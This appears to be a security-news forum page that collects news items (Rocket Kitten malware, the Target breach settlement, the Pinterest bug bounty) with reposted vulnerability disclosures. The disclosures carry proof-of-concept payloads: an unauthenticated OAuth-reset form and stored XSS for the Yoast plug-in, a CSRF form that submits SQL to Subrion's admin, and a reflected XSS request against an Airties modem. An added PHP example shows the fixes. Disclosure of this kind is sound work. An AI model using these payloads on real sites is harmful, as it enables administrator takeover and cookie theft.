Wool3n.H4t is believed to have taken part in past Rocket Kitten attacks. "Consistent with the other malware used by the threat actors involved in Operation Woolen Goldfish, the command and control reference is hard-coded as an IP address in the binary," read the paper. "A domain name was not used. Moreover, it lands on the system with a name, which is very similar to some Ghole malware variants [used by Rocket Kitten]." The paper highlighted the malware as proof the Rocket Kitten hackers are developing new attack tools and could become an even bigger threat in the very near future. Rocket Kitten is one of many targeted attack groups currently active. On 12 March, researchers at Kaspersky reported finding evidence the Equation group has been developing and mounting sophisticated attacks since at least 2003. Source
-
Target pitches $10m settlement following mega data breach
Aerosol posted a topic in Stiri securitate
Target has agreed to pay $10m worth of damages to victims of its 2013 "mega data breach", in a proposed settlement to a class-action lawsuit against it. CBS News reported the deal, claiming that if approved by a federal court judge, individual victims could be paid as much as $10,000 in damages. Target had not responded to V3's request for comment on the report at the time of publishing. The Target breach is believed to have occurred between 27 November and 15 December 2013, and saw hackers break into Target's systems and steal customers' credit and debit card numbers, card expiration dates and debit card PINs. The hackers also stole as many as 70 million customers' names, phone numbers and email and mailing addresses. Numerous security firms subsequently reported finding Target customer details being sold on a number of underground forums. The data breach was credited as one of the biggest in history and led to a complete overhaul of Target's security strategy and systems, as well as a shake-up in the firm's upper management. Target chief information officer (CIO) Beth Jacob resigned from her role in the wake of the data breach in March 2014. Target chief executive Gregg Steinhafel soon followed, stepping down from his role in May 2014. The breach has already had serious financial consequences for Target. Target revealed in February that the cost of the breach had reached $162m. The class-action lawsuit against it in the US District Court of Minnesota is one of many being mounted against Target. The US Department of Justice is also mounting its own investigation into the breach. Target is one of many firms to suffer mass data breaches over the past few years. TalkTalk admitted in February to falling victim to a data breach that let criminals defraud thousands of pounds from its customers. Law enforcement agencies have been racing to combat data breaches. US law enforcement charged three men believed to have been behind "the largest data breach in US history" in March.
US president Barack Obama outlined plans to create an improved data breach reporting regime for businesses hit by hackers in January. Source
-
Pinterest has stopped giving out t-shirts and started paying cash for vulnerabilities found under its bug bounty program. The web clipboard will offer up to US$200 under the BugCrowd-managed program for nine of its assets, including the Android and iOS applications. Security engineering lead Paul Moreno said the number of bug reports increased tenfold since it launched its tee-shirt bug bounty prior to its migration to HTTPS. "Prior to the HTTPS migration, we were hesitant to open a paid bug bounty program because of a number of known vulnerabilities associated with being only HTTP," Moreno says. "Now that a number of gaps have been closed as a result of the migration, we’re happy to announce that we’ve upgraded the program with payouts results. "We highly encourage the whitehat hacker community to use our program and report bugs, which helps us keep Pinners safe and increase our security posture." Top bounties will go to remote code execution, "significant" authentication bypass, cross site request forgery, and cross-site scripting. Punters bearing HTTPOnly cookie flags and end of life browser bugs need not apply. Pinterest ran into some problems during its lauded HTTPS migration beginning in Britain, including impact to browser performance, mixed secure and insecure content warnings, and higher content delivery network costs. Source
-
A New York City Police Department (NYPD) auxiliary deputy inspector was arrested Wednesday morning for allegedly hacking into a restricted NYPD computer and other sensitive law enforcement databases. Yehuda Katz used the databases to collect information on individuals who had been involved in traffic accidents in the New York City area, according to an FBI press release. He then posed as an attorney, among other things, and solicited them for a 14 percent fee. Katz allegedly used multiple electronic devices in the NYPD's 70th Precinct that were capable of streaming video and remotely accessing NYPD computers. He was then able to obtain the login information from uniformed officers to view the databases he didn't have permission to access, including one belonging to the FBI. If convicted, Katz faces up to 10 years in prison. Source
-
EMC M&R (Watch4net) Web Portal Report Favorites XSS
EMC Secure Remote Services Virtual Edition SQL Injection
EMC Secure Remote Services Virtual Edition Command Injection
EMC M&R (Watch4net) Device Discovery Path Traversal
EMC M&R (Watch4net) MIB Browser Path Traversal
EMC M&R (Watch4net) Alerting Frontend XSS
EMC M&R (Watch4net) Centralized Management Console XSS
-
OVERVIEW
========

Google Analytics by Yoast is a WordPress plug-in for monitoring website traffic. With approximately seven million downloads it’s one of the most popular WordPress plug-ins.

A security vulnerability in the plug-in allows an unauthenticated attacker to store arbitrary HTML, including JavaScript, in the WordPress administrator’s Dashboard on the target system. The JavaScript will be triggered when an administrator views the plug-in’s settings panel. No further user interaction is required.

Typically this can be used for arbitrary server-side code execution via the plugin or theme editors. Alternatively the attacker could change the administrator’s password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target site.

DETAILS
=======

The impact is a combination of two underlying problems.

Firstly, missing access control allows an unauthenticated user to modify some of the settings associated with the plug-in. It’s possible to overwrite the existing OAuth2 credentials which the plug-in uses for retrieving data from Google Analytics, and thereby connect the plug-in with the attacker’s own Google Analytics account.

Secondly, the plug-in renders an HTML dropdown menu based on the data downloaded from Google Analytics. This data is not sanitized or HTML-escaped. If the said attacker enters HTML code such as <script> tags in the properties in their Google Analytics account settings, it will appear in the WordPress administrative Dashboard of the targeted system and get executed whenever someone views the settings.

PROOF OF CONCEPT
================

The following HTML snippet could be used to hijack the Google Analytics account of a website running a vulnerable version of the plug-in:

    <a href="http://YOUR.BLOG/wp-admin/admin-post.php?reauth=1">reauth</a>
    <br><br>
    <form method=POST action="http://YOUR.BLOG/wp-admin/admin-post.php">
    <input type=text size=100 name="google_auth_code">
    <input type=submit>
    </form>

First, the attacker would click the reauth link. The action doesn't require any kind of authentication. It will reset some of the plugin settings and redirect the attacker to a google.com OAuth dialog, where they'd get an authentication code.

Next the attacker would copy-paste the code in the above form and submit. This would update the code in the plugin settings - again without requiring authentication. The plugin would now retrieve its data from the attacker's Google Analytics account.

The actual payload script would be entered at the attacker's own Google Analytics account settings at https://www.google.com/analytics/web/?hl=en#management/Settings/

An example of a property name:

    test"><script>alert('stored XSS')</script>

This would fire an alert box whenever an administrator views the Analytics settings page in the Dashboard of the target WordPress site. A real-world attack would probably use a src attribute to load a more sophisticated script from an external site. It could make chained ajax calls to load and submit administrative forms, including those of the plugin editor to write server-side PHP code, and finally execute it.

SOLUTION
========

Yoast was notified on March 18, 2015. A new version of the plug-in (5.3.3) was released the next day.

CREDITS
=======

The vulnerability was found by Jouko Pynnönen of Klikki Oy, Finland.

An up-to-date version of this document is available at http://klikki.fi/adv/yoast_analytics.html

--
Jouko Pynnönen <jouko@iki.fi>
Klikki Oy - http://klikki.fi - @klikkioy

Source
-
# Affected software: subrion
# Type of vulnerability: csrf to sql injection
# URL: http://demo.subrion.org
# Discovered by: Provensec
# Website: http://www.provensec.com
# version v3.3.0
# Proof of concept

There is no CSRF protection on the database form, which makes Subrion vulnerable to database injection. Vulnerable parameter: query

poc:

    <html>
    <body>
    <form action="http://demo.subrion.org/admin/database/" method="POST">
    <input type="hidden" name="query" value="SELECT * FROM `sbr301_albums` `id` " />
    <input type="hidden" name="table" value="sbr301_albums" />
    <input type="hidden" name="field" value="id" />
    <input type="hidden" name="exec_query" value="Go" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>

Source
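The Yoast advisory above describes a state-changing admin action reachable without authentication plus remote data rendered unescaped into the Dashboard, and the Subrion post shows a form that accepts a cross-site POST because it carries no CSRF token. The following is an added example, written for this page and not code from the Yoast plug-in, from Subrion, or from their authors: a WordPress admin-post handler and settings renderer that closes all three gaps. The action name `example_ga_save_code`, the option `example_ga_auth_code` and the page slug `example-ga` are hypothetical; the WordPress core functions used (`add_action`, `current_user_can`, `check_admin_referer`, `wp_nonce_field`, `esc_attr`, `esc_html`, `selected`, `update_option`, `wp_safe_redirect`) are real core APIs.

```php
<?php
/**
 * Added example (not the Yoast plug-in's or Subrion's own code).
 *
 * Hypothetical names (assumptions): action 'example_ga_save_code',
 * option 'example_ga_auth_code', settings page slug 'example-ga'.
 */

// Register the handler on 'admin_post_{action}' only. The companion hook
// 'admin_post_nopriv_{action}' serves logged-out visitors and is deliberately
// left unregistered, so an unauthenticated POST never reaches this code.
add_action( 'admin_post_example_ga_save_code', 'example_ga_save_code' );

function example_ga_save_code() {
    // Being logged in is not enough: the OAuth code rebinds the whole site's
    // analytics source, so require the capability that gates plug-in settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to change these settings.', 403 );
    }

    // CSRF defence: the request must carry a nonce tied to this action and to
    // the current user. check_admin_referer() calls wp_die() on a mismatch, so
    // a form hosted on another site (as in the Subrion proof of concept) fails.
    check_admin_referer( 'example_ga_save_code' );

    $code = isset( $_POST['google_auth_code'] )
        ? sanitize_text_field( wp_unslash( $_POST['google_auth_code'] ) )
        : '';
    update_option( 'example_ga_auth_code', $code );

    wp_safe_redirect( admin_url( 'admin.php?page=example-ga&saved=1' ) );
    exit;
}

/**
 * Render the settings form. $properties maps property ids to display names
 * exactly as they came back from the remote analytics account, so every value
 * is treated as attacker-controlled and escaped at the point of output.
 * In a real plug-in this is the callback registered with add_options_page().
 */
function example_ga_render_settings( array $properties, $selected_id ) {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <?php wp_nonce_field( 'example_ga_save_code' ); // writes the _wpnonce field ?>
        <input type="hidden" name="action" value="example_ga_save_code">

        <label for="google_auth_code">Google authentication code</label>
        <input type="text" id="google_auth_code" name="google_auth_code" size="100">

        <label for="example_ga_property">Property</label>
        <select id="example_ga_property" name="example_ga_property">
        <?php foreach ( $properties as $id => $name ) : ?>
            <option value="<?php echo esc_attr( $id ); ?>"<?php selected( $selected_id, $id ); ?>>
                <?php echo esc_html( $name ); // quotes and angle brackets become entities ?>
            </option>
        <?php endforeach; ?>
        </select>

        <input type="submit" class="button button-primary" value="Save">
    </form>
    <?php
}

// Constructed sample input: the property name from the advisory's proof of
// concept. Because esc_html() encodes the quote and the angle brackets, the
// Dashboard displays the string as text instead of executing it.
example_ga_render_settings(
    array( 'UA-00000000-1' => 'test"><script>alert(\'stored XSS\')</script>' ),
    'UA-00000000-1'
);
```

Two design points worth noting. The capability check and the nonce check are independent defences: the capability check stops an unprivileged but logged-in user, while the nonce stops a privileged user's browser from being driven by a third-party page. And escaping is done at output rather than on the way in, so whatever the remote account returns is stored as-is and can never be rendered as markup by this template.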
-
Airties Air5650TT Modem Web Interface Reflected XSS Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
Love to => KedAns-Dz & _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu ( milw00rm.com )
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Hardware/Web App : Airties
|~Affected Version : Air6372SO , Air5650TT
|~Official Web: http://www.airties.com
|~RISK : Light
####################INFO################################
On the same network, using a social engineering scenario against the person managing the modem, the admin cookies can be captured.
########################################################
----------------------------------------------------------
Proof image: http://i.hizliresim.com/RJAXV6.png
----------------------------------------------------------
Request
----------------------------------------------------------
GET http://192.168.2.1/top.html?productboardtype=%3Ch4%3Eh4%20Here%3C/h4%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

Request Headers:
Host[192.168.2.1]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]

Response Headers:
Content-Type[text/html]
DLast-Modified[Tue, 10 Jun 2014 12:43:09 GMT]
Content-Length[4594]

Source